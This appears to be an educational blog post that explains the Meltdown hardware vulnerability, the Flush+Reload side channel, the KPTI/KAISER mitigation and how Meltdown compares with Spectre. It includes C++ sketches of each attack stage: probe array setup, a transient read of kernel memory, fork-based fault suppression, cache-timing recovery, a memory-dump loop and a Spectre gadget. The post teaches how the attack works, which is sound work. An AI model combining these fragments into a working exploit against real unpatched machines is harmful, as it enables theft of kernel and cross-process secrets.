‘Melting’ down Meltdown

Allan Chang
Systems and Network Security
9 min read · Apr 18, 2020

By Borys Bryndak and Allan Chang.

In January 2018, we were introduced to a pair of hardware vulnerabilities known as Meltdown and Spectre. We are going to take a look at Meltdown today. Memory isolation is a central security feature of modern operating systems. At the same time, for performance reasons, user memory and kernel memory are typically mapped together into a single virtual address space: one half of all possible addresses is occupied by the kernel and is only accessible by the kernel, while the other half belongs to the user process. The separation between these parts is usually enforced at the hardware level via a supervisor bit, which ensures that kernel memory is only accessible while running kernel code. The Meltdown attack “melts” this security boundary by allowing any user process to dump all of the kernel’s memory, and even parts of the memory of other processes running on the system.

The repercussions of this vulnerability are considered catastrophic by many security experts, and yet no real-world exploitation of it is known. A popular misconception is that Meltdown only affects Intel CPUs, but in the original research paper the attack was also successfully performed on a Galaxy S7 with a Samsung Exynos 8 Octa 8890 SoC, which consists of four ARM Cortex-A53 cores and four Exynos M1 “Mongoose” cores; Samsung’s custom Exynos cores were determined to be vulnerable. A modified version of Meltdown targeting system registers rather than inaccessible memory is also possible on some ARM processors.

What makes Meltdown unique is that it is a hardware attack, which means it is independent of the operating system and does not rely on software vulnerabilities. Typically, the whole physical memory is mapped in kernel space so that the kernel can access any data in physical memory. This allows Meltdown to dump the contents of the entire physical memory, including the memory of other processes running on the system and the memory used by guest virtual machines.

Before diving into Meltdown, it is necessary to understand several peculiar features of modern CPUs:

Out-of-Order Execution

A superscalar pipelined processor with five functional units. Tanenbaum, Structured Computer Organization, Fifth Edition

A key feature of modern superscalar processors is out-of-order execution. Each CPU consists of multiple components, or functional units, that perform different types of operations such as addition, multiplication, division, or address resolution. Since these components are independent, the CPU can parallelize some instructions and achieve much higher effective computation speeds. Moreover, instructions can be split into several steps, like reading an operand, performing an arithmetic calculation, and writing the result back. This allows the CPU to pipeline instructions, i.e., to work on different stages of different instructions simultaneously. So rather than executing instructions strictly in order, the CPU looks ahead and executes operations as soon as their resources are available. Advanced CPU architectures go as far as executing some instructions before the CPU even knows whether those operations will need to be executed at all. By doing so, the CPU maximizes the utilization of its components and speeds up computation, since it does not wait for each operation to complete before starting the next.

Memory Hierarchy

Illustration by Ryan J. Leng

Current memory technology lags behind computing technology. That is to say, a CPU can process data much faster than any storage device can fetch it. To remedy this memory bottleneck, computers have multiple layers of memory built with different technologies: the fastest and most expensive ones are closest to the CPU (the caches), while slower but larger ones (DRAM) sit between the caches and permanent storage such as a hard disk or SSD. Each level is faster than the level below it, and each level stores recently used sections of memory from the lower level in the hope that they can be quickly fetched when they are used again.

Such a configuration significantly improves computer performance, but it introduces a subtle vulnerability. If several processes, or several threads within the same process, have access to a page in memory, they can easily check whether that page has been recently used by simply measuring the time it takes to access it. Meltdown takes advantage of this through a Flush+Reload side-channel attack, which uses the timing difference between memory accesses to communicate illegally accessed data to the attacker. More on this later.
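To make the timing difference concrete, here is a minimal sketch, assuming an x86-64 CPU and a GCC/Clang compiler with the <x86intrin.h> intrinsics, that times the same read twice: once while the cache line is warm, and once after flushing it. The large gap between the two numbers is exactly the signal that Flush+Reload relies on.

#include <cstdint>
#include <cstdio>
#include <x86intrin.h>

// Time a single read of *p in TSC cycles.
static uint64_t timed_read(volatile char *p) {
    unsigned int aux;
    uint64_t start = __rdtscp(&aux);   // timestamp before the access
    (void)*p;                          // the memory access being timed
    return __rdtscp(&aux) - start;     // timestamp after the access
}

int main() {
    static char buf[4096];
    buf[0] = 1;                        // touch the page so it is mapped and cached
    uint64_t hit = timed_read(buf);    // expected: fast (cache hit)

    _mm_clflush(buf);                  // evict the cache line
    _mm_mfence();
    uint64_t miss = timed_read(buf);   // expected: much slower (served from DRAM)

    printf("cached: %llu cycles, flushed: %llu cycles\n",
           (unsigned long long)hit, (unsigned long long)miss);
}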

The Attack

Pseudo-C++ code snippet showing a possible implementation of the Meltdown attack

A key component of Meltdown is the usage of transient instructions and transient instruction sequences.

1 raise_exception(); 
2 // the line below is never reached
3 access(probe_array[data * 4096]);

Toy example from Lipp et al. [1]

Here we see that the 3rd line of the code should never run, because an exception is raised before that point is reached. Architecturally it never takes effect, yet the CPU may still execute it out of order before the exception is handled. An instruction that is executed but never committed to the architectural state is called a transient instruction, and a sequence of such instructions is called a transient instruction sequence.

Why are transient instructions relevant? When code executes out of order, transient instructions are executed but never committed, so architecturally it appears as if they were never executed at all. Even though we cannot see their results directly, they leave traces of the data they touched in the CPU cache, since the cache is not cleared when switching between user mode and kernel mode. Using a cache side-channel attack, we can then extract the value encoded in the cache state, thus reading kernel memory without the proper permissions.

A process operating in user space cannot access kernel memory unless it is running kernel code, which is enforced at the hardware level by the supervisor bit. Although kernel memory cannot be accessed in user mode, the whole kernel memory is still mapped into the process’s virtual address space, so every kernel virtual address points to a valid location in physical memory. Because this legitimate mapping exists, an access from user space still has a well-defined target even without the proper permissions. Normally such an access raises an exception, but with out-of-order execution the CPU may perform the load before the permission check takes effect; it simply never commits the result to a state visible to the user.

In the attack, the first thing to do is to set up an array, which we will call the probe array. This array will be used to communicate the secret value through a cache side-channel attack such as Flush+Reload.
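A minimal sketch of that setup, under the common assumption of one 4 KB page per possible byte value (256 pages in total), might look like this; the clflush intrinsic assumes an x86 target and a GCC/Clang-style compiler.

#include <cstddef>
#include <cstdint>
#include <cstring>
#include <x86intrin.h>

constexpr size_t PAGE = 4096;           // one page per possible byte value
uint8_t probe_array[256 * PAGE];        // 256 slots -> 256 possible secret bytes

void prepare_probe_array() {
    // Touch every page once so all of them are actually backed by memory.
    memset(probe_array, 1, sizeof(probe_array));
    // Flush every slot so that, afterwards, none of the 256 pages is cached.
    for (size_t i = 0; i < 256; ++i)
        _mm_clflush(&probe_array[i * PAGE]);
    _mm_mfence();
}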

Then, we prepare a sequence of instructions that reads a secret value from kernel space and uses that value as an index into the probe array. This produces a transient instruction sequence that the CPU will execute but never commit, since the faulting access means that point in the program is never reached architecturally.
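Conceptually, the sequence looks something like the sketch below. The real exploit writes this in hand-tuned assembly, and a compiler is under no obligation to emit exactly this shape, so treat it as an illustration of the data flow rather than working attack code; kernel_addr is a hypothetical pointer into kernel space.

#include <cstdint>

extern uint8_t probe_array[];           // the 256-page array set up earlier
volatile uint8_t sink;                  // keeps the dependent load alive

void transient_sequence(const uint8_t *kernel_addr) {
    // Architecturally this load faults, but out-of-order execution may already
    // have forwarded the loaded byte to the dependent instruction below.
    uint8_t secret = *kernel_addr;
    // Dependent access: touches exactly one page of the probe array,
    // leaving a cache footprint whose index encodes the secret byte.
    sink = probe_array[secret * 4096];
}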

When running the code in user mode, accessing a secret value stored in kernel memory raises an exception and terminates the program, since we do not have the proper permissions. This can be bypassed in two ways: we can either fork the process and perform the access in the child process, or we can use transactional memory, which makes the sequence of memory accesses behave like a single instruction; when an illegal memory access is performed, the transaction simply aborts and the code continues as normal.
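A minimal sketch of the fork-based variant, assuming a POSIX system and reusing the hypothetical transient_sequence from above: the child performs the faulting access and is killed by the resulting signal, while the parent survives and can inspect the cache afterwards.

#include <cstdint>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

void transient_sequence(const uint8_t *kernel_addr);

void attempt_leak(const uint8_t *kernel_addr) {
    pid_t pid = fork();
    if (pid == 0) {
        // Child: runs the transient sequence and dies on the illegal access.
        transient_sequence(kernel_addr);
        _exit(0);                       // only reached if no fault occurred
    }
    // Parent: wait for the child, then reload the probe array (next step).
    waitpid(pid, nullptr, 0);
}

The transactional-memory variant instead wraps the same sequence in an Intel TSX transaction (_xbegin()/_xend()), so the fault aborts the transaction rather than delivering a signal; it avoids killing a process for every leaked byte.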

If we use our example of a parent and child process: after the process is forked, out-of-order execution causes the transient instructions to run in the child, which includes reading the secret value from kernel memory and performing operations based on it. When the CPU realizes that the access was illegal, the child process is terminated and control returns to the parent process.

As the child process was discarded, we cannot observe the architectural effects of the transient instructions, but they do leave the CPU cache modified. This is important, as we will use the cache to communicate the secret value.

To communicate the secret value, we use an attack called Flush+Reload. First, we flush the CPU cache to make sure our probe array is not cached. When a process is forked, the child process receives a copy of the parent’s memory; due to the copy-on-write (COW) policy, the memory is not actually copied until there is a write, so the parent and child share the same physical memory until then. When the child process reads the secret value from kernel memory, it uses the probe array to communicate the result by simply reading (and therefore caching) one page of the probe array.

How do we communicate the result using an array? By checking the time it takes to read from the probe array.

The two processes are most likely running on two different cores with private L1 and L2 caches, but the L3 cache is shared between all cores of the CPU. So if the parent process notices that the time to read a page of the probe array is similar to an L3 cache hit, it can conclude that the child process accessed that page, which means that the page’s index is the secret value the child read.
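A minimal sketch of that reload step, under the same assumptions as before (256 one-page slots, rdtscp-based timing, and a cache-hit threshold that has to be calibrated per machine):

#include <cstdint>
#include <x86intrin.h>

constexpr uint64_t CACHE_HIT_THRESHOLD = 120;   // assumed; tune for the machine
extern uint8_t probe_array[];                   // 256 * 4096 bytes, flushed earlier

int recover_byte() {
    for (int value = 0; value < 256; ++value) {
        volatile uint8_t *slot = &probe_array[value * 4096];
        unsigned int aux;
        uint64_t start = __rdtscp(&aux);
        (void)*slot;                            // reload this candidate page
        uint64_t elapsed = __rdtscp(&aux) - start;
        if (elapsed < CACHE_HIT_THRESHOLD)      // fast read -> it was cached
            return value;                       // this index is the leaked byte
    }
    return -1;                                  // no hit; the attempt is retried
}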

By repeating this procedure many times, it is possible to dump the entire kernel address space, together with the physical memory mapped into it, at a rate of 3.2 KB/s to 503 KB/s.
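Putting the hypothetical pieces sketched above together (prepare_probe_array, attempt_leak, and recover_byte are the assumed helpers from the earlier sketches), the outer loop that dumps a region of kernel memory byte by byte might look roughly like this:

#include <cstddef>
#include <cstdint>

void prepare_probe_array();
void attempt_leak(const uint8_t *kernel_addr);
int  recover_byte();

// Dump `len` bytes starting at the (hypothetical) kernel address `start`
// into `out`, retrying each byte until the reload phase reports a cache hit.
void dump_kernel_memory(const uint8_t *start, uint8_t *out, size_t len) {
    for (size_t i = 0; i < len; ++i) {
        int value = -1;
        while (value < 0) {
            prepare_probe_array();      // flush all 256 probe pages
            attempt_leak(start + i);    // transient access in a child process
            value = recover_byte();     // Flush+Reload recovers the byte
        }
        out[i] = static_cast<uint8_t>(value);
    }
}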

What was the solution?

KAISER was the proposed software fix. Rather than mapping the whole kernel memory into the user’s virtual address space, KAISER maps only the small set of kernel addresses required by a few x86 architectural operations, such as handling interrupts and exceptions. These required addresses do not store any secrets, so leakage through them is unlikely. In addition, because only this essential part of the kernel is mapped in user space, finding the location of the rest of the kernel in the virtual address space becomes non-trivial. The Linux implementation, known as Kernel Page-Table Isolation (KPTI), maintains two page tables per process: one for user mode and one for kernel mode. In user mode only the user page table is active, so only the user memory and the small required portion of kernel memory are mapped. Only in kernel mode does the process gain access to the rest of kernel memory, including the mapping of the whole physical address space.
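As an aside, recent Linux kernels report whether KPTI is active through sysfs; a small check (Linux-specific, and assuming a kernel new enough to expose this file) typically prints “Mitigation: PTI” on a patched system:

#include <fstream>
#include <iostream>
#include <string>

int main() {
    std::ifstream status("/sys/devices/system/cpu/vulnerabilities/meltdown");
    std::string line;
    if (status && std::getline(status, line))
        std::cout << line << "\n";      // e.g. "Mitigation: PTI"
    else
        std::cout << "status not exposed by this kernel\n";
}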

Though Meltdown may be fixed in newer Intel processors, the concept of the attack spawned a new wave of research into security flaws arising from out-of-order and speculative execution. In March 2020, a new attack in this family was disclosed, known as Load Value Injection (LVI).

The key takeaway is that there are always new security flaws waiting to be discovered: we might assume our systems are secure today, but a novel attack may be discovered tomorrow.

Meltdown vs. Spectre

Meltdown and Spectre share the same fundamental idea: they leverage out-of-order execution and a cache covert channel to infer data that was not supposed to be accessible to them. The key difference between Meltdown and Spectre is that Meltdown is completely independent of the victim’s software. It works whenever there is a vulnerable CPU and an unpatched operating system. However, it is also more limited for the same reason: not all CPUs are vulnerable, and operating systems have known solutions to prevent it. In fact, the solution to Meltdown (KAISER) was known even before Meltdown appeared, though it was intended to solve a different but related problem.

Spectre, on the other hand, requires an attacker to find specific vulnerabilities in each piece of software they want to break. For instance, a code snippet like the one sketched below can be used to leak the value of target_array[x], similarly to the way it was done in Meltdown. The difference is that the transient instructions under the bounds check are triggered by mistraining the CPU’s branch predictor to always take that branch, and then supplying a value of x that is out of bounds of target_array. The CPU still speculatively executes the branch and performs an access into probe_array based on the value read from outside target_array. From there, we already know how to reconstruct that value.
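For reference, a conceptual Spectre variant 1 gadget of the kind described in Kocher et al. [2] might look like the sketch below; target_array, target_array_size, and probe_array are placeholder names standing in for whatever the victim program actually exposes.

#include <cstddef>
#include <cstdint>

extern uint8_t  target_array[];
extern size_t   target_array_size;
extern uint8_t  probe_array[];          // 256 * 4096 bytes, flushed beforehand
volatile uint8_t spectre_sink;          // keeps the dependent load alive

void victim_function(size_t x) {
    // After the branch predictor has been trained with many in-bounds values
    // of x, an out-of-bounds x is still speculatively taken down this path.
    if (x < target_array_size) {
        // Speculative out-of-bounds read, followed by a dependent probe-array
        // access that leaves a cache footprint indexed by the leaked byte.
        spectre_sink = probe_array[target_array[x] * 4096];
    }
}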

References

[1] M. Lipp, M. Schwarz, D. Gruss, T. Prescher, W. Haas, A. Fogh, J. Horn, S. Mangard, P. Kocher, D. Genkin, Y. Yarom, and M. Hamburg, “Meltdown: Reading kernel memory from user space,” in 27th USENIX Security Symposium (USENIX Security 18), 2018.

[2] P. Kocher, J. Horn, A. Fogh, D. Genkin, D. Gruss, W. Haas, M. Hamburg, M. Lipp, S. Mangard, T. Prescher, M. Schwarz, and Y. Yarom, “Spectre attacks: Exploiting speculative execution,” in 40th IEEE Symposium on Security and Privacy (S&P’19), 2019.
